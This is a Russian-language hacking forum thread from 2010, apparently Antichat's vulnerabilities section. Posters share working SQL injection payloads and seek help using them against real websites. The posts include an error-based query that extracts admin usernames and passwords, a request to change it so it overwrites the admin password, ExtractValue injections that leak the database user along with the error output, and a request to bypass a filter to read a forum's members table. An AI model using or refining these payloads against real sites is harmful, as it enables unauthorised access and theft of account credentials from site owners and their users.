HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #14181  
Старый 03.07.2010, 14:44
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

Цитата:
Сообщение от Iggy  
load_file()?!
Si tacuisses, philosophus mansisses (Boetius)
 
Ответить с цитированием

  #14182  
Старый 03.07.2010, 15:50
Rabben
Новичок
Регистрация: 27.03.2009
Сообщений: 11
С нами: 9012765

Репутация: 1
По умолчанию

Имеется запрос:

Код:
(select+1+from+(select+count(0),concat((select+concat_ws(0x3a,username,password)+from+admins+limit+0,1),floor(rand(0)*2))+from+admins+group+by+2)a)--+
нужно переделать под замену значения password, тоесть хочу подменить использующийся уже password.
 
Ответить с цитированием

  #14183  
Старый 03.07.2010, 16:10
Dr.Frank
Постоянный
Регистрация: 31.07.2002
Сообщений: 312
С нами: 12513535

Репутация: 187
По умолчанию

Цитата:
Сообщение от Rabben  
нужно переделать под замену значения password, тоесть хочу подменить использующийся уже password.
имеешь ввиду "update admins set password=......" ?

насколько я знаю, комбинировать запросы select и update нельзя
 
Ответить с цитированием

  #14184  
Старый 03.07.2010, 16:18
Cybersteger
Познающий
Регистрация: 09.10.2009
Сообщений: 31
С нами: 8730571

Репутация: 19
По умолчанию

помогите, как правильно сделать запрос ?

site.com/search/?search=1&search_words=j&search_section_id=25'&sea rch_cond=1&search_numrows=10

DB query error: SELECT t.tr_id FROM t_tree_index as ti, t_tree as t, t_tree_visible as tv WHERE (ti.parent_id=25' OR ti.tr_id=25') AND ti.tr_id=t.tr_id AND t.lang_id='3' AND t.tr_id=tv.tr_id AND tv.lang_id='3' AND tv.part_id='1' /var/www/localhost/htdocs/site/back/inc/db_mysql.php on line 326
 
Ответить с цитированием

  #14185  
Старый 03.07.2010, 16:22
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

Цитата:
Сообщение от Rabben  
Имеется запрос:
Код:
(select+1+from+(select+count(0),concat((select+concat_ws(0x3a,username,password)+from+admins+limit+0,1),floor(rand(0)*2))+from+admins+group+by+2)a)--+
нужно переделать под замену значения password, тоесть хочу подменить использующийся уже password.
если бы можно было запросом из браузера изменять значения в БД, то я думаю % похеканных сайтов стал намного больше, и раздел рашифровка хешей не нужен был бы совсем...
 
Ответить с цитированием

  #14186  
Старый 03.07.2010, 16:24
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

Цитата:
Сообщение от Cybersteger  
помогите, как правильно сделать запрос ?
site.com/search/?search=1&search_words=j&search_section_id=25'&sea rch_cond=1&search_numrows=10
DB query error: SELECT t.tr_id FROM t_tree_index as ti, t_tree as t, t_tree_visible as tv WHERE (ti.parent_id=25' OR ti.tr_id=25') AND ti.tr_id=t.tr_id AND t.lang_id='3' AND t.tr_id=tv.tr_id AND tv.lang_id='3' AND tv.part_id='1' /var/www/localhost/htdocs/site/back/inc/db_mysql.php on line 326
да что же такое? откуда вы все нарисовались с такими умными вопросами? почитай-ка клац
 
Ответить с цитированием

  #14187  
Старый 03.07.2010, 16:39
Cybersteger
Познающий
Регистрация: 09.10.2009
Сообщений: 31
С нами: 8730571

Репутация: 19
По умолчанию

мда чел .. я это читал и нераз, помогало, но не в этом случае, я хз как здесь делать, комментарием после WHERE (ti.parent_id=2 order by 1/* OR ti.tr_id=2 order by 1/*) (-- ,+--+,#...) нелзя закрыть, а в пидзапросах полохо понимаю потому и запостив мб кто-то знает (мне кажется здесь должен быть пидзапрос).
 
Ответить с цитированием

  #14188  
Старый 03.07.2010, 17:27
Dr.Frank
Постоянный
Регистрация: 31.07.2002
Сообщений: 312
С нами: 12513535

Репутация: 187
По умолчанию

Тебе нужен примерно такой результат: WHERE (ti.parent_id=2) order by 1/*

Подсказка есть - пробуй.
 
Ответить с цитированием

  #14189  
Старый 03.07.2010, 19:18
Cybersteger
Познающий
Регистрация: 09.10.2009
Сообщений: 31
С нами: 8730571

Репутация: 19
По умолчанию

ага ) (site.com/search/?search=1&search_words=jjh&search_section_id=99999 99)+and+ExtractValue(1,concat(0x5c,(user())))--)

MySQL Error : XPATH syntax error: '\user@127.0.0.2'

только теперь непонятно, версия 5.1.41 , а infromation_schema будто нет что это?

site.com/search/?search=1&search_words=jjh&search_section_id=99999 99)+and+ExtractValue(1,concat(0x5c,(select+schema_ name+from+infromation_schema.schemata+limit+1,1)))--

MySQL Error : SELECT command denied to user 'user'@'127.0.0.2' for table 'schemata'

.....ExtractValue(1,concat(0x5c,(select+schema_nam e+from+infromation_schedasdma.schemata+limit+1,1)) )--

MySQL Error : SELECT command denied to user 'user'@'127.0.0.2' for table 'schemata' --одинаково потому и думаю что infromation_schema нет
 
Ответить с цитированием

  #14190  
Старый 03.07.2010, 19:24
#Wolf#
Постоянный
Регистрация: 26.03.2008
Сообщений: 311
С нами: 9540826

Репутация: 479
По умолчанию

вобщем есть запрос на выборку из таблы ibf_members

символ "_"(в имени таблицы) заменяется на "ampersand#95;"

и только в тех случаях, когда в строке(имя таблицы) есть "ibf_".

в остальных случаях "_" проходит.

Есть мысли? И как возможно это обойти?

Спасибо.

//пробовал с помощью подзапроса - не вышло.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...